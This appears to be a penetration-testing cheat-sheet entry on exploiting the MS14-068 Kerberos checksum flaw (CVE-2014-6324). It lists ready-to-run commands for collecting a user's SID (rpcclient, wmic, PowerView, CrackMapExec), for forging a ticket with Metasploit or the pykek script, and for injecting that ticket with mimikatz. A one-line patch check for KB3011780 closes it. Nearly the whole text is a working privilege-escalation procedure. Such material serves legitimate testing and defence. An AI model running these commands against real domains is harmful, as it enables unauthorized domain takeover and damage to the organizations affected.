Kerberos Checksum Vulnerability MS14-068 CVE-2014-6324

Steps:

1: This exploit require to know the user SID, you can use rpcclient to remotely get it or wmi if you have an access on the machine.

1) RPCClient

rpcclient $> lookupnames john.smith

2) WMI

wmic useraccount get name,sid

3) Powerview

Convert-NameToSid high-sec-corp.localkrbtgt

4) CrackMapExec

crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid

2: Generate a ticket with metasploit or pykek

1) Metasploit

Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum

2) Python Kerberos Exploitation Kit (pykek)

$ python ./ms14-068.py -u USERNAME@DOMAIN_NAME -s USER_SID  (-p PASS) -d DOMAIN_CONTROLLER_ADDRESS

3: Then use mimikatz to load ticket

mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"

Mitigations

Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780